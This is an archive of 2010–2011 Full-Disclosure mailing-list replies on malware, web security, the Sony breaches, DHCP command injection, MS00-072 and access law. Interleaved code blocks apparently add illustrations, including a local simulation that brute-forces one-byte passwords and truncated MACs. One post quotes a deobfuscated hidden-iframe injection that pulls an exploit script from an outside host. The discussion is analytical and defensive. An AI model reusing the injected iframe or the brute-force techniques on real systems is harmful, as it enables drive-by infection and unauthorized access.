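            urlsafe_b64("\nhttps://www.example.com/\n"), site) is None,
        "plus_mangled": " " in as_seen_by_form_processor(std),
        "mangled_rejected": validated_link(
            as_seen_by_form_processor(std), site) is None,
        "urlsafe_survives": as_seen_by_form_processor(urlsafe_b64(own_page))
        == urlsafe_b64(own_page),
    }
```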


Re: [Full-disclosure] PenTestIT.com RSS feed suspicius

2011-07-05 Thread Nick FitzGerald
Andrew Farmer to ector dulac:

> > Looks suspicious to me
> 
> Very. That unescapes to:
> 
> document.write(' src="http://innessphoto.com/forum.php?tp=675eafec431b1f72"; width="1" 
> height="1" frameborder="0">')
> 
> Which loads some amusingly obfuscated JS ...

Really?

That amused you?

Maybe my irony detector is on the blink, but that was very ordinary 
several years ago.

> ...  which looks like it's
> *supposed* to be a plugin exploit of some sort, but which has no
> real payload. At least, not when I looked. 

U -- not what I got at all.

I got a very old, very common multi-exploit script that, if successful, 
(that is, if run on a sufficiently old, sufficiently unpatched, system) 
would have downloaded and executed a PE that was only just very 
recently (a bit less than three hours ago) submitted to VirusTotal, 
with these results:

   http://www.virustotal.com/file-scan/report.html?id=9a68644038cb4f6a0b3b2057c5cdf5a22898675ebc20baedc601dfc94d9fa3e1-1309914305

Of course, what you get served from any given "exploit script" URL can 
vary greatly, from hour-to-hour, GeoIP-to-GeoIP, and equally amongst 
apparent browser User-Agents (including OS (OS X vs. Windows vs. 
others) and even OS version (XP vs. Vista/Win7), etc), HTTP referer 
headers, presence or absence or contents of cookies, and so on and so 
forth...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-06-28 Thread Nick FitzGerald
Christian Sciberras wrote:

> Rather than that, I'd say the dev team is out of sync with the security
> team..

Assuming that that may be a reasonable one-sentence encapsulation of 
how Joomla development is organized...

The fact such a sentence can be meaningfully uttered tells us there 
are major problems _inherent_ in Joomla.

The kind of problems that scream "Why would anyone in their right mind 
use it?"

Oh, wait -- it's written in PHP, right...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Absolute Sownage (A concise history of recent Sony hacks)

2011-06-11 Thread Nick FitzGerald
Georgi to Valdis:

> > if you eliminate 95% of the holes, it may be
> > *effectively* secure, simply because it isn't worth the attacker's time to
> > fight for the other 5%
> 
> wtf?
> 
> if someone has working exploit, the probability of breaking is 100% no matter 
> what the constant 95% is claimed to be.
> 
> about fighting for 5%: malware like nimda and code red appear 
> counterexamples - 
> i suppose they automatically fought for 100% and got what they could get 
> (quite above your 5%).

So, you're both (kinda) right.

Nowadays the big, noisy, obvious, "own the net" type "outbreak" of 
yesteryear is not the model of choice for your typical cyber-thug (you 
know, those running virtually all malware these days)...

In fact, _avoiding_ exactly that is pretty much top of their list of 
desiderata.

Sure, once upon a time, making a big, fast, splash and owning as much 
of the net as possible (usually for as trivial a result as possible), 
was de rigueur.  It was pretty much _required_ that you operate that way so 
as to keep ahead of the "anti-bad-guys" updating their defenses to 
detect, block or otherwise mitigate you.

But just as VBA macro viruses were, once (yes, kids, go read your 
history books!) "the thing", so is "owning the net, big, fast and 
noisy" no longer the model of choice...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Absolute Sownage (A concise history of recent Sony hacks)

2011-06-10 Thread Nick FitzGerald
mrx wrote,

> I am a little frightened that my web app will be owned and user
> credentials exposed.  ...

Keep that attitude when you are no longer a "noob" web-app developer 
and the world will be a better place.

There are far too many "hack" web coders out there, and the evidence 
suggests that Sony employs quite a few of them...

> ...  I have read much on SQL injection, XSS, remote
> execution, session hijacking etc. I only think I have all bases
> covered, I am not 100% sure. Is there a definitive text/book/white
> paper on such matters and if so could someone please let me know
> where I can find this? 

I'm not a web-app expert at all -- I live and work in a niche 
necessitated by the appalling condition that is "web security" in 
general  (I'm a malware analyst who spends much of my time looking at 
the stuff the bad guys who break poorly configured servers, poorly 
configured and/or written web-apps, etc, etc put on those compromised 
machines to wreak havoc further down the food chain) -- but if you're a 
web-app developer and do not know about OWASP or what the OWASP "Top 
10" is, you're probably a shockingly bad web-app developer (but 
probably well able to get plenty of work at the likes of Sony).



Regards,

Nick FitzGerald




Re: [Full-disclosure] New attack vector for sale, firewall bypass

2011-06-07 Thread Nick FitzGerald
ascii wrote:

> ... on Windows one has to resort to
> things like debug.exe.

OK, so 64-bit systems are dealing to this, but has everyone forgotten 
.COM files and "executable ASCII"?

I mean, with a handle like yours...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Online Base64 Decoder & Encoder with ASCII/Hex Output

2011-05-26 Thread Nick FitzGerald
SecurityXploded Group wrote:

> Here is one of our new online tools, Base64 Decoder & Encoder.  Apart
> from attractive, easy to use interface, it shows output in both ASCII
> & HEX format.

Limited to 500 chars input?

> It will be more useful for folks who are more involved in crypto stuff.

Because of Base64's proven strength and irreversibility?



Regards,

Nick FitzGerald




Re: [Full-disclosure] Sony: No firewall and no patches

2011-05-09 Thread Nick FitzGerald
Thor (Hammer of God) wrote:

> Maybe they should call that "You don't have to patch" genius!  Lol
> 
> http://www.eweek.com/c/a/Security/Sony-Networks-Lacked-Firewall-Ran-Obsolete-Software-Testimony-103450/

Or, to paraphrase Sony BMG's (then) Global Digital Business President 
Thomas Hesse*:

   Most people, I think, don't even know what patch management, threat
   assessment or a firewall is, so why should _we_ care about them?

This group of companies clearly has DNA to prevent them from learning. 
Maybe a good reaming by the legal system this time will finally 
penetrate their corporately-ignorant ways?  (And yes, somewhat 
ironically, I am sending this from a Sony laptop...)



* http://www.npr.org/templates/story/story.php?storyId=4989260 -- the 
quote is from around 1:56 in the audio.





Regards,

Nick FitzGerald




Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread Nick FitzGerald
Cal Leeming wrote:

> Didn't seem to work for me:
> 
> http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage+refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b

It certainly did when I first reported that URL back in Sep 2007.

A far from exhaustive bit of testing just now shows that it appears 
that Google is doing a Referer check on just those search terms (not 
just on the order), as you can do an "I'm feeling Lucky" search _from 
Google_ for those terms and get auto-redirected to the top search 
result, but if you just hit one of those search URLs with the IFL flag, 
you get the search results rather than an auto-redirect.

Did you think to try some less well-publicized URL abusing this 
functionality?

I wonder which other (if any) IFL abuse URLs that have been used in 
spam, scams and such Google blocks?



Regards,

Nick FitzGerald




Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread Nick FitzGerald
Leon Kaiser wrote:

> I don't see why people are able to directly link to "I'm Feeling Lucky"
> Google search results in the first place. Can anyone think of a
> practical use for it?

Putting a Referer check on "I'm Feeling Lucky" was suggested back 
in/around September 2007, but as it still works from anywhere, you can 
see how much Google-oids really take the company's "do not facilitate 
the less than desirable" to heart...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-09 Thread Nick FitzGerald
satyam pujari wrote:

> Here is a simple Google's "I'm Feeling Lucky" search feature exploitation
> scenario.
> [...]

Yawn...

That's _so_ 2007!

   http://www.virusbtn.com/resources/spammerscompendium/lucky.xml

...and I seriously doubt that was the first time it was done, just when 
_I_ happened to make a note of it being actively abused in spam.

All that other stuff about free hosting sites and IFrames on 
blogger.com is unnecessary implementation detail that can be achieved 
multitudinous ways.



Regards,

Nick FitzGerald




Re: [Full-disclosure] ISC DHCP Client [3.0.x to 4.2.x] Arbitrary Command Execution (CVE-2011-0997)

2011-04-06 Thread Nick FitzGerald
coderman to Valdis.Kletnieks:

> > Otherwise if a valid dhcp server hands you foo.bar.baz.example.com your
> > hostname just became foobarbazexamplecom - whoops.
> 
> a DHCP server should not reply with a FQDN as hostname.
> 
> hostname 'foo' at domainname 'bar.baz.example.com' is legit though...

So Valdis' complaint about the "fix":

   new_host_name=${new_host_name//[^a-zA-Z0-9]/}

still partly stands.

They should at least have gone with:

   new_host_name=${new_host_name//[^-a-zA-Z0-9]/}

as hyphens are valid in host names.

Whether the code should gracefully handle itself in misconfigured 
environments, or more, to what extent it should, is ultimately up to 
the developers, so they can quibble over the dot character...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread Nick FitzGerald
ghost wrote:

> To sum up what full-disclosure has become:
> 
> random arrested and charged with drug possession = 30+ posts
> 
> unreal ircd backdoored = 4? responses.

But, most of us immediately understand the issues from the IRCD 
backdoor, whereas at least the discussion worth reading in the 
"Congratulations Andrew" thread has actually been on-topic, clarifying 
common (at least among the ignorati that style themselves "hackers" 
these days) misunderstandings about what constitutes authorized access 
_and_ is also (loosely) on-topic for the actual thread as this issue 
seems likely to be at the heart of any case involving the iPad/AT&T 
data "leak", in which the person who is the actual subject of the 
"Congratulations Andrew" thread also seems likely to be involved...

So your stats are rather misleading.



Regards,

Nick FitzGerald




Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread Nick FitzGerald
bk to wilder_jeff Wilder:

> > By that same standard.. if you leave your house unlocked does
> > that give someone the right to enter it? 
> > 
> > just my thoughts
> 
> Sending from the right account this time...
> 
> It wasn't an unlocked house.  It was a table on the sidewalk with
> all the neighbors' Girlscout cookie order sheets on it.  Someone
> just happened to pickup not only their order sheet, but everyone
> else's too. 

That may be what _you_ see as a relevant analogy, but that's not how 
most legal systems will see it.  To most legal systems it matters not 
that the folk ostensibly responsible for "protecting" the data 
effectively just laid it all out (more or less) in public view.  The 
pertinent legal questions will likely revolve around whether the 
accessor could reasonably claim they did not know they were not 
authorized to access that data.

And how will the courts assess whether the accessor was authorized to 
access that data?  Simple -- they ask the "owner" of the data (AT&T) 
who will surely say "we did not authorize the defendant to access that 
data", and they will probably blandly add something like "and we took 
industry-standard measures to reasonably protect the data against 
unauthorized access".  Whilst the latter is apparently rather easily 
debunked, doing so is pretty irrelevant to defending an "unauthorized 
access" charge, as regardless of how easily (trivially in this case) 
the access was obtained, the issue is "was that access authorized".

Many apparently stupid things have been built into our computer and 
technology laws.  These often don't actually make much sense if you 
think the objective of such laws should be to encourage data guardians 
to do a better job of their charge, but mostly these laws have been 
made to make it relatively easy to obtain prosecutions.

> Think you could get a theft prosecution for that?

And touché to Valdis' response making fun of this part of your post 
too!



Regards,

Nick FitzGerald




Re: [Full-disclosure] Congratulations Andrew

2010-06-16 Thread Nick FitzGerald
T Biehn wrote:

> Furthermore if I access an online resource and I notice that the information
> ends and the URL has a &page=1 on the end and no link exists on that page to
> say... &page=2 is that illegal?

IANAL, but I recall a few years back a huge uproar over a case in 
Germany where the ruling effectively was that what you just described 
would be considered "illegal access" (or "unauthorized access" or 
whatever the actual wording of the relevant German law is, translated 
into English).  IIRC, the precise details in that case revolved around 
the technically simpler act of crawling back up the directory tree 
exposed by a publicly disclosed URI.  That is, the judge (??) ruled 
that accessing a URI like:

   http://www.example.com/1/2/

was in breach of whatever law when, in fact, only a URI like:

   http://www.example.com/1/2/3/

or:

   http://www.example.com/1/2/foo.htm

had ever been explicitly published or provided in an authorized page as 
a link.

Again, as I understand that ruling, it effectively said that accessing 
any URI that had not been explicitly published as a link was deemed to 
be unauthorized access.

In and/or from Germany, of course...

> On the same note, if I notice something that looks like a SELECT statement
> in a URL (due to excellent coding) is it illegal for me to modify that
> SELECT statement to return other information?

To _return_ (that is "only read") other data?  That's getting greyer...

However, under most jurisdictions with some legal notion of "authorized 
access" the answer is probably "fairly clearly yes" if you alter such 
URIs in ways that are likely to alter the contents of the database.  
The reasoning here goes something like if you have the ability to 
recognize that that is what those parts of the URI are for, then it is 
likely to be deemed reasonable that you should also understand the 
implications of altering those parts of such a URI.  If you then issue 
a request for such a modified URI that you reasonably should have been 
aware would alter data in whatever database, then you are knowingly 
altering data that you do not know you have authorization to alter (or, 
worse, that you know you do not have authorization to alter).

> Is the legality of access to the resource something that must be explicitly
> granted to me or is it some abstract property depending on the content I've
> accessed? Is it legal to randomly fuzz web service arguments without knowing
> the data that it will return?

Good questions, but in general, in jurisdictions with notions of 
authorized access, you should be very careful with _other people's_ 
data, as it is unlikely the courts will have much sympathy for you 
tweaking anything that is not explicitly "yours", particularly if you 
appear to be aware that accessing or changing someone else's data that 
you reasonably should know you were not entitled to access/change in 
that way was a likely outcome.

That is, just because you can doesn't mean you should...

> Usually systems of this nature will have an EXPLICIT notice that you cannot
> access data on it unless you're authorized OR will require (as it does now)
> authentication.

AFAIK, most "authorized access" type legislation puts the onus _on the 
accessor_ to be _sure_ that they have the proper authority for whatever 
they are doing, and _not_ on the access provider to _prevent_ anything 
but authorized access.

> Did the ICCID count as authentication if it is not explicitly labeled by
> AT&T as such? A field like:
> &password would clearly be illegal to brute force.
> 
> An analogy to a case with CLEARLY AND EXPLICITLY defined law regarding
> private property doesn't really seem to fit.

Sorry -- don't know what US (and even possibly which state) legislation 
would cover this case.  Presumably some ugly intersection of federal 
laws and those of the states where the perpetrator(s) resided 
(and/or obtained access from), the state(s) where the accessed AT&T 
server(s) were, perhaps even the state where AT&T is incorporated 
and/or has its head office, and perhaps even the state(s) where the 
network access services, proxy devices, etc used by the perpetrators 
were?



Regards,

Nick FitzGerald




Re: [Full-disclosure] Secunia Research: Microsoft Excel Record Parsing Input Validation Vulnerability

2010-06-08 Thread Nick FitzGerald
Paul Heinlein wrote:

> > 04/12/2009 - Vendor notified.
> > 04/12/2009 - Vendor response.
> > 11/01/2010 - Status update requested.
> > 12/01/2010 - Vendor provides status update.
> > 30/03/2010 - Vendor provides status update.
> > 27/04/2010 - Vendor provides status update.
> > 26/05/2010 - Vendor provides status update.
> > 08/06/2010 - Public disclosure.
> 
> 15.75 months to respond to a critical vulnerability in one of the most 
> widely used business applications the world has seen? w00t.

U -- your US-centric view of dates is showing rather obviously, 
unless you can explain the unexpected appearance of a 27th month this 
year -- one that, even more oddly, came after the 30th month and before 
the 26th, which itself came before the 8th month which itself has come 
before we've reached the middle of June, the 6th month...

Or maybe your US-centric view of dates coupled with your loathing of MS 
blinded you to your date inadequacies?



Regards,

Nick FitzGerald




Re: [Full-disclosure] What are the basic vulnerabilities of a software?

2010-05-31 Thread Nick FitzGerald
rajendra prasad wrote:

> Hi List,
> I am preparing a list of main and basic vulnerabilities in software. Please
> let me know If you know other than the below list.

Why yes, I do...

> List of Basic Vulnerabilities:
> 1. Buffer Overflow: Stack, Heap.
> 2. Format String Vulnerabilities
> 3. SQL Injections
> 4. XSS Vulnerabilities

Cheating on a homework assignment?

Arguably only one of the above is a basic vulnerability (and even that 
is probably debatable) -- the other three are just examples of one or 
other basic types (and two of them are probably examples of the same 
basic type).  Try to get hold of the RISOS Project report(s) or sources 
that summarize that work.  Any good, basic CompSec textbook should 
cover this stuff, BUT there is more than one widely referenced 
comprehensive categorization of basic security errors, so you should 
probably check around a bit...



Regards,

Nick FitzGerald




Re: [Full-disclosure] adobe pdf file format

2010-05-31 Thread Nick FitzGerald
rajendra prasad wrote:

> I am trying to understand the latest pdf file format vulnerabilities. But i
> didnt get complete pdf file format. I got a brief introduction document
> written by Dr. Edgar Huckert ref: http://www.huckert.com/ehuckert/pdfart.pdf.
> Please help me in this regard.

Did you even _try_ Google?

   http://www.google.com/search?q=pdf+file+format

has the Wikipedia entry about the file format in first place (and 
includes links to the current version of Adobe's "official" 
documentation of the format and other useful resources), and has the 
"Adobe PDF Developer Center: PDF reference" page as the second result.

Given your inability to do such basic Google searches that would find you 
exactly the answer you want, it seems a waste of effort to add links to 
other useful information, generator code that makes "interesting" PDFs, 
and the like, so I won't...



Regards,

Nick FitzGerald




Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread Nick FitzGerald
Christian Sciberras wrote:

> This is a seriously flawed argument.

Correct...

> JS == plain text. Full Stop.

...but that has nothing to do with the reasons why.

First, because it is simply wrong (FSVO "plain text").

For just one trivial example, the following Javascript doesn't look 
anything like anything normally considered "plain text":

   http://cecil.auckland.ac.nz/scripts/menu.js

yet it runs as designed (and there's no need for anyone to provide an 
explanation of what it is, what it does, how it works, etc).

In the contexts in which Javascript is typically relevant, and 
specifically in this case, the colloquial "plain text" is generally 
expected to be material that can be safely transferred across the 
internet under text/plain character encoding.  While the above example 
may survive that on a binary-clean transport (like HTTP) it just might 
not on other common internet protocol transports.

And, FWIW, the ECMAScript standard says, in the first sentence of 
Section 6 ("Source Text"):

   ECMAScript source text is represented as a sequence of characters
   in the Unicode character encoding, version 3.0 or later.

Again, close-minded as it is, Unicode and "plain text" typically do NOT 
mean the same thing on the Internet (an oversight that will probably be 
"fixed" within another generation or so).

I think you confused "plain text" with "necessarily scrutable", or 
similar.



Regards,

Nick FitzGerald




Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread Nick FitzGerald
Ed Carp wrote:

> We've got a lot of JQuery code that calls back-end web services, and
> we're worried about exposing the web services to the outside world -
> anyone can "view source" and see exactly how we're calling our web
> services.
> 
> Are there any suggestions or guidelines regarding protecting one's
> source from such disclosure?  Thanks in advance!

If the details have to be in the JS (really?) then accept that they 
have to be exposed to all and sundry and design to that constraint 
(which may mean deciding that you really don't want to drink the web 
2.0 Kool-Aid after all...).

There are all manner of weaselly described/advertised code "encryptors" 
and such, which are really just obfuscators.  If the code has to run in 
the (JS interpreter of the) client browser, it is necessarily available 
to any marginally competent "attacker" (or even me).  Anyone motivated 
enough (and that will not have to be terribly motivated) will be able 
to untangle the results of such and then try to make sense of the 
remaining representation of your code.



Regards,

Nick FitzGerald




Re: [Full-disclosure] newest category of security bugs considered elite ?

2010-05-01 Thread Nick FitzGerald
Dan Kaminsky to me to him:

> >> I really like the hash length declaration bugs, where the client can
> >> tell the server how many bytes of a hash need to be validated.  (Yep,
> >> you just say "one byte is plenty")
> >>
> >> SNMPv3 and XML-DSIG both fell to this, catastrophically.
> >
> > I thought Georgi asked for the newest class of elite vulns?
> >
> > Does (at least) ten years old count as new?
> >
> Ooh, SMB's old Hollywood OS bug -- one character at a time attacks.  

Well, you could use it for char-at-a-time extraction of the actual 
password, if that was what you wanted (and utilities to do just that 
were written based on the original PoC code for the vuln -- see URL 
below for that POC code), BUT you could simply say (as the client) 
"here is the one char password" and, so long as it matched the first 
char of the actual server-side view of the correct password, you were 
given access to the resource, reducing the difficulty of gaining access 
to something like a 36 char (maybe plus a few punctuation chars?) space 
and thus 18 (or a few more) attempts on average (or were these 
passwords case-sensitive?  Doesn't seem likely for non-NT Windows...).  
I don't recall now if you could just say "here is the zero char 
password" -- I have an idea I saw that claim made but was not able to 
reproduce it in my tests...

The advisory from the original (well, credited) discoverers tends to 
support this explanation (moved from its original URL, which is widely 
broken-linked around the web):

   http://www.nsfocus.com/en/advisories/0005.html

<>
> This bug class is different, and as far as I know unseen from the 80's  
> and 90's. In this one, you tell the remote system, 'sure, I can match  
> your stored hash -- but it's only one byte long.'. So you try an  
> average of 128 passwords, and off you go.

Sounds just like the above if your only concern was breaking access to 
the specific resource, rather than recovering the actual password (the 
massive speeding up of which was a handy side-effect of the actual 
MS00-072 bug).

> It's basically a problem where the client is trusted to provide  
> excessive metadata about server state.  ...

As I said, that sounds just like the real problem at the core of 
MS00-072.  The client tells the server how long a password it is going 
to supply and instead of the server failing the supplied password because 
it's too short (relative to the configured one) it accepts it so long 
as it matches the configured password up to the client-specified 
length...

You're talking about hashes and MS00-072 is about cleartext passwords, 
but I don't see that that is relevant to the class of vuln here.

> ...  If you've got other examples in  
> this family, it'd be cool to hear them.

This is the only one that immediately comes to mind...



Regards,

Nick FitzGerald


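The bug class the thread circles around is a server that lets the client declare how much of a secret gets compared. Added example (a toy model written for this discussion, not the code of MS00-072, SNMPv3 or any real server): the client-declared-length check beside a hardened check that always compares the whole secret, for both the share-password case and Dan's hash-length variant. All secrets, keys and messages are constructed values.

```python
"""The length-declaration bug class from the thread (MS00-072 share
passwords; the hash-length variant), as an added example. This is a toy
model written for the discussion, not the code of any real server;
secrets and keys are constructed values."""
import hashlib
import hmac


def vulnerable_verify(supplied: bytes, stored: bytes) -> bool:
    """Trusts the client-declared length: compares only as many bytes of
    the stored secret as the client sent, so any correct prefix is
    accepted (in this model, even an empty one)."""
    declared_len = len(supplied)
    return stored[:declared_len] == supplied


def hardened_verify(supplied: bytes, stored: bytes) -> bool:
    """The server decides how much is compared: the whole stored secret,
    in constant time, and a length mismatch is simply a failure."""
    return hmac.compare_digest(supplied, stored)


def make_tag(message: bytes, key: bytes) -> bytes:
    """Full-length HMAC-SHA256 tag (32 bytes)."""
    return hmac.new(key, message, hashlib.sha256).digest()


def vulnerable_mac_verify(message: bytes, key: bytes, tag: bytes,
                          declared_len: int) -> bool:
    """The hash-length variant: the client also declares how many bytes
    of the MAC are to be validated. A declared length of 1 leaves a
    256-way guess; a declared length of 0 needs no guess at all."""
    expected = make_tag(message, key)
    return expected[:declared_len] == tag[:declared_len]


def hardened_mac_verify(message: bytes, key: bytes, tag: bytes) -> bool:
    """Tag length is server policy (the full digest), never client input."""
    expected = make_tag(message, key)
    return len(tag) == len(expected) and hmac.compare_digest(tag, expected)


def expected_guesses(alphabet_size: int) -> float:
    """Mean number of tries to hit one uniformly random symbol out of N
    when every try is a fresh symbol: (N + 1) / 2. About 18 for the
    thread's 36-symbol password alphabet, about 128 for a one-byte
    hash prefix."""
    return (alphabet_size + 1) / 2
```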


Re: [Full-disclosure] newest category of security bugs considered elite ?

2010-05-01 Thread Nick FitzGerald
Dan Kaminsky wrote:

> I really like the hash length declaration bugs, where the client can  
> tell the server how many bytes of a hash need to be validated.  (Yep,  
> you just say "one byte is plenty")
> 
> SNMPv3 and XML-DSIG both fell to this, catastrophically.

I thought Georgi asked for the newest class of elite vulns?

Does (at least) ten years old count as new?

   http://www.microsoft.com/technet/security/bulletin/ms00-072.mspx

And against Win9x count as elite?   8-)

FWIW, MS00-072 was fairly widely exploited in the wild by at least the 
Opaserv (aka Opasoft) family of worms, though not until a couple (?) of 
years after the bulletin's release.



Regards,

Nick FitzGerald


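The bug class discussed in the two MS00-072 messages above (a server that compares only as many bytes of a credential as the client says it is sending, whether that credential is a cleartext share password or an HMAC tag), as an added example that is not code from any of the posts. Everything in it is constructed: the password, the key and the message are made up, and the check functions are a stand-in for the SMB, SNMPv3 and XML-DSIG code paths, which are not reproduced here. It shows the one-byte login Kaminsky describes (at most 256 guesses), byte-at-a-time recovery of the whole password (at most 256 guesses per byte), the same trick against a truncated MAC, and a fixed check that ignores the client's idea of the length.

```python
import hashlib
import hmac

# Constructed secrets for the simulation (not real credentials or keys).
SECRET_PASSWORD = b"s3cretpw"
HMAC_KEY = b"constructed-shared-key"


def vulnerable_password_check(supplied: bytes, declared_len: int) -> bool:
    """Server compares only as many bytes as the client declared (the bug)."""
    return supplied[:declared_len] == SECRET_PASSWORD[:declared_len]


def fixed_password_check(supplied: bytes, declared_len: int) -> bool:
    """Server ignores the client's length: full-length, constant-time compare."""
    if declared_len != len(SECRET_PASSWORD) or len(supplied) != declared_len:
        return False
    return hmac.compare_digest(supplied, SECRET_PASSWORD)


def vulnerable_mac_check(message: bytes, tag: bytes, tag_len: int) -> bool:
    """Same bug for an authenticator: only tag_len bytes of the HMAC are checked."""
    expected = hmac.new(HMAC_KEY, message, hashlib.sha1).digest()
    return tag[:tag_len] == expected[:tag_len]


def fixed_mac_check(message: bytes, tag: bytes, tag_len: int) -> bool:
    """The tag must be the full digest length, compared in constant time."""
    expected = hmac.new(HMAC_KEY, message, hashlib.sha1).digest()
    if tag_len != len(expected) or len(tag) != tag_len:
        return False
    return hmac.compare_digest(tag, expected)


def one_byte_login(check):
    """Declare a one-byte password and try all 256 values: (accepted, guesses)."""
    for guess in range(256):
        if check(bytes([guess]), 1):
            return True, guess + 1
    return False, 256


def recover_password(check, max_len=64):
    """Extend a known prefix one byte at a time: (recovered, guesses).

    Stops when no byte extends the prefix any further, which against the
    vulnerable check means the whole password has been recovered.
    """
    recovered, guesses = b"", 0
    for _ in range(max_len):
        for guess in range(256):
            guesses += 1
            candidate = recovered + bytes([guess])
            if check(candidate, len(candidate)):
                recovered = candidate
                break
        else:
            break  # no byte matched at this position
    return recovered, guesses


def forge_tag(check, message: bytes):
    """Declare a one-byte tag and brute-force it: (accepted, guesses)."""
    for guess in range(256):
        if check(message, bytes([guess]), 1):
            return True, guess + 1
    return False, 256


if __name__ == "__main__":
    msg = b"GET /"  # constructed message to authenticate
    print("1-byte login, vulnerable:", one_byte_login(vulnerable_password_check))
    print("1-byte login, fixed:     ", one_byte_login(fixed_password_check))
    print("recovery, vulnerable:    ", recover_password(vulnerable_password_check))
    print("recovery, fixed:         ", recover_password(fixed_password_check))
    print("forged MAC, vulnerable:  ", forge_tag(vulnerable_mac_check, msg))
    print("forged MAC, fixed:       ", forge_tag(fixed_mac_check, msg))
```

The fixed variants make the server, not the client, the authority on how long the credential is; the constant-time compare is there so that the length fix does not simply turn a length oracle into a timing oracle.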


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-25 Thread Nick FitzGerald
Tracy Reed to me:

> > Anyone authoritatively stating that antivirus software is a necessary 
> > component of a "reasonably secure" system is a fool.
> 
> No, they just think all the world is Windows.

My comments were, and still are, OS agnostic.

It matters not what the OS -- anyone authoritatively stating that 
antivirus software is a necessary component of a "reasonably secure" 
system is a fool.

Ditto my second comment...

> > So _if_, as you and another recent poster strongly imply, the PCI 
> > standards include a specific _requirement_ for antivirus software, then 
> > the standards themselves are total nonsense...
> 
> PCI only requires antivirus for systems commonly affected by
> viruses.  ...

Then, as I said, the PCI requirements are total nonsense...

> ...  This means Windows. PCI security council has said that UN*X
> OSs etc. are not required to have antivirus.

So what system and application integrity requirements do they require 
for those OSes (presumably "instead of antivirus")?

Your response strengthens my belief that PCI is dangerous because it 
enshrines small-minded ignorance as "best practice" (or, at least, as 
"minimally acceptable practice") without recognizing the possibility 
that there may be better options that have not been so, ummm "over 
sold" as to become perceived as necessary.



Regards,

Nick FitzGerald




Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-25 Thread Nick FitzGerald
Shaqe Wan wrote:

<<...>>
> Because it shall be nonsense to deal with CC, and not have an Anti-virus for 
> example !!

Well, you see, _that_ is abject nonsense on its face.

Do you have any understanding of one of the most basic of security 
issues -- default allow vs. default deny?

There are many more secure ways to run systems _without_ antivirus 
software.

Anyone authoritatively stating that antivirus software is a necessary 
component of a "reasonably secure" system is a fool.

Anyone authoritatively stating that antivirus software is a necessary 
component of a "sufficiently secure" system is one (or more) of; a 
fool, a person with an unusually low standard of system security, or a 
shill for an antivirus producer.

So _if_, as you and another recent poster strongly imply, the PCI 
standards include a specific _requirement_ for antivirus software, then 
the standards themselves are total nonsense...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-10 Thread Nick FitzGerald
Tracy Reed to Digital X:

> > Having just gone through a PCI audit I can safely say a few things:
> 
> Not the fault of PCI. Perhaps you should consider a better auditor.

Um -- isn't the point that PCI is set up such that lowest (common 
denominator amongst) auditors are actually the ones that define what 
"PCI compliance" really is?

As an earlier poster already pointed out, all the vaguely recent major 
credit card data theft cases have involved "fully PCI compliant" (as 
defined by that perpetrator's PCI auditors) card processors, etc...

What part of "that's really fsck'ed-up" did you not understand?

...

Sure, you _can_ retain a "morally [and maybe even technically] 
superior" PCI auditor, but WTF does that buy you other than a bigger 
bill for an essentially meaningless "certification"?

Did any of those massive "PCI accredited" fsck-up operators lose their 
accreditations?  Did any of them have to give up their CC processing 
business activities as a result of their _proven_ (by the mostly 
generally trivial "hacks" that fsck'ed them up) poor practice?

So why would any other "must be PCI compliant" operators even consider 
spending more money than the lowliest of PCI auditors charge?



Regards,

Nick FitzGerald




Re: [Full-disclosure] Disk wiping -- An alternate approach?

2010-01-25 Thread Nick FitzGerald
I've resisted getting involved in this and suspect that this may be a 
misguided attempt to clarify (??) a few things, but...

Bipin Gautam wrote:

> Before: "From the prosecutor's perspective, everything your hard drive is 
> yours"
> 
> I just proved : everything your hard drive is NOT NECESSARILY YOURS.

This need not matter.  In several (many, most and increasing) Western 
jurisdictions _just possessing_ certain kinds of material is a criminal 
offense.  This is typically child pornography and/or bestiality but 
often includes other more or less specific things.  For example, 
writing as I am from New Zealand right now, I would almost certainly be 
committing an indecency offense by including the words "golden" and 
"shower" run together into a single phrase in this Email.

Within such jurisdictions, the issue of "knowledgeable possession" or 
"intent to possess" are technically irrelevant to the issue of "did you 
breach this law", for as written, the offence is "possession" (and/or 
production, etc, etc) with no elaboration.

> DOES THAT CHANGE ANYTHING? LOGIC MAYBE???

I guess to assess that, we have to first decide whether you know what 
you're talking about or not...

And have you not heard of "the Trojan Horse defense"?  Kinda the legal 
opposite of "the dog ate my homework" and already successfully used a 
few times.



Regards,

Nick FitzGerald




Re: [Full-disclosure] Surge in Skype Spam activity

2010-01-11 Thread Nick FitzGerald
dramacrat wrote:

> h, shall I click a tinyurl coming from a f-d poster?
> 
> n/n, pick one
> 
> this is email, not twitter. if you're sharing a legitimate link, there's no
> reason not to directly link to it.

Whilst I agree entirely with these sentiments, at least tinyurl has a 
(I thought well-known) "preview" option that does not require a browser 
plugin -- simply prefix the tinyurl.com domain name with the "preview" 
sub-domain and instead of auto-redirecting you tinyurl will tell you 
the redirection URL.

Also, is using a commandline URL grabber like curl or wget to see the 
301 redirect target really that difficult for a 1337 F-D hax0r such as 
yourself?

FWIW, the target URL is:

   http://securityextension.com/securitylab

which really doesn't seem worth the effort of shortening...



Regards,

Nick FitzGerald


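The "look at the 301 target without visiting it" step from the message above, done in Python instead of curl or wget, as an added example that is not code from the post. It refuses to follow redirects and reports the Location header instead, which is the same information the preview. sub-domain trick exposes. So that it runs offline, the shortener is a constructed local stub on 127.0.0.1 with a made-up link table; the resolver itself works against any real URL.

```python
import http.server
import threading
import urllib.error
import urllib.request


class NoRedirect(urllib.request.HTTPRedirectHandler):
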